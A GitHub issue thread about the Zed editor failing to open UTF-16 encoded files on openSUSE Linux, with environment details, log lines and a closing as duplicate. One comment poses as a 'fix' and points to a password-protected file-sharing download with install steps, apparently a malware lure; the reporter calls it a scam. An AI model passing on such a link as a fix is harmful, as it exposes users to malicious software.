### ISSUE TITLE
Can´t open UTF16 files on Linux

### ISSUE THREAD

**Issue by nmajorov** [zed-industries/zed#17190]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

On Linux trying to open file encoded in UTF-16 
```
file -i testutf16.txt 
testutf16.txt: text/plain; charset=utf-16le

```
Get the error message -> " Stream did not contain valid UTF-8. Please try again".

### Environment

```
zed --version
Zed 0.150.4 – /home/nmajorov/.local/zed.app/libexec/zed-editor

 uname -a
Linux niko-suse-laptop 6.10.5-1-default #1 SMP PREEMPT_DYNAMIC Fri Aug 16 11:15:41 UTC 2024 (30fd964) x86_64 x86_64 x86_64 GNU/Linux


cat /etc/os-release 
NAME="openSUSE Tumbleweed"
# VERSION="20240820"
ID="opensuse-tumbleweed"
ID_LIKE="opensuse suse"
VERSION_ID="20240820"
PRETTY_NAME="openSUSE Tumbleweed"
ANSI_COLOR="0;32"
# CPE 2.3 format, boo#1217921
CPE_NAME="cpe:2.3:o:opensuse:tumbleweed:20240820:*:*:*:*:*:*:*"
#CPE 2.2 format
#CPE_NAME="cpe:/o:opensuse:tumbleweed:20240820"
BUG_REPORT_URL="https://bugzilla.opensuse.org"
SUPPORT_URL="https://bugs.opensuse.org"
HOME_URL="https://www.opensuse.org"
DOCUMENTATION_URL="https://en.opensuse.org/Portal:Tumbleweed"
LOGO="distributor-logo-Tumbleweed"
```

### If applicable, attach your Zed.log file to this issue.

2024-08-31T08:52:06.76395337+02:00 [INFO] Initializing default prettier with plugins {}
2024-08-31T08:52:06.764115413+02:00 [INFO] starting language servers for Rust: rust-analyzer
2024-08-31T08:53:04.781215005+02:00 [INFO] Initializing default prettier with plugins {}
2024-08-31T08:53:04.781321833+02:00 [INFO] starting language servers for Rust: rust-analyzer
2024-08-31T08:53:53.049367498+02:00 [ERROR] stream did not contain valid UTF-8
2024-08-31T08:54:02.321150607+02:00 [ERROR] stream did not contain valid UTF-8
2024-08-31T08:58:38.849281584+02:00 [ERROR] stream did not contain valid UTF-8

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nmajorov** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

what is this for scam messages  here ?

**Comment by bitfield** [comment]
> Please try again

And did trying again help? (see #16795)

**Comment by SomeoneToIgnore** [comment]
https://github.com/zed-industries/zed/issues/16965 seems to cover that all, so I'll close this.
